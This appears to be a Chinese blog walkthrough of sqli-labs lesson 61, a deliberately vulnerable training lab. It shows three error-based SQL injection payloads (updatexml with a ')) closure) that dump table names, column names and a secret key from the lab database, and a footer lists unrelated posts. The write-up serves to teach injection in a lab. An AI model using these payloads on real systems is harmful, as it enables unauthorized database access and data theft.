sqli-labs-Less-61

SQLI-LAPS 实验记录

Less-61

这一关与上一关类似,只是闭合方式不同,为单引号加双括号的方式,依然采用报错注入的方式通关。

根据之前的经验,我们在命令行中采用单引号加双括号来闭合,使用报错注入命令:

sql 复制代码
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) --+

结果如图所示,能够爆出表名SU367R5TLR。

接下来,我们继续使用该语句来进行注入,爆出数列名以及秘钥,语句如下:

  • 查询列名
php 复制代码
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='SU367R5TLR'),0x7e),1)--+

查询结果为secret_CH6P。

  • 查询秘钥
php 复制代码
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(secret_CH6P) from challenges.SU367R5TLR),0x7e),1) --+

查询如图所示,秘钥为RGPHim48wGuZe9NvjtVXnQ2f。
之后,将查询出的密钥输入页面下方的对话框中,就可以看到成功信息了。

相关推荐
程序员在囧途22 分钟前
likeadmin-api API 中转站怎么做统一报价?从 /pricing、/user/balance 到 task_id 回执的落地方法
运维·服务器·数据库·likeadmin-api·api中转站·token计费
龙石数据1 小时前
MySQL 全量同步到 Hive 怎么做?三步配置教程
数据库·hive·mysql·数据治理·数据中台
程序员在囧途2 小时前
likeadmin-api API 算力超市怎么做供应商切换?统一鉴权、task_id 和 callback_url 才能稳交付
java·服务器·数据库·开放api·likeadmin-api·api算力超市
数据工匠老o2 小时前
连接池配置实战——从“连不上“到“连太多“的完整排查指南
数据库
一只专注api接口开发的技术猿3 小时前
电商评论自动化监控与情感数据分析完整落地教程(附可直接运行 Python 代码)
大数据·数据库·python·数据分析·自动化
hh真是个慢性子3 小时前
GaussDB Inside 2.23.01.280 集中式一主一备安装
数据库·database·gaussdb·国产数据库·高斯
沉静的小伙3 小时前
Spring事务
java·数据库·spring
大侠锅锅3 小时前
第 3 篇:节点自动化纳管——从裸机到可管理的 7 步安装流水线
数据库·自动化·边缘计算·iot
笃行3503 小时前
踩坑实战 | MySQL/PostgreSQL 迁移必踩:LEFT JOIN 莫名丢数据,KES 外连接消除避坑指南
数据库
摇滚侠3 小时前
Redis7 零基础到进阶 Linux 离线安装 Redis 09-10
数据库·redis·缓存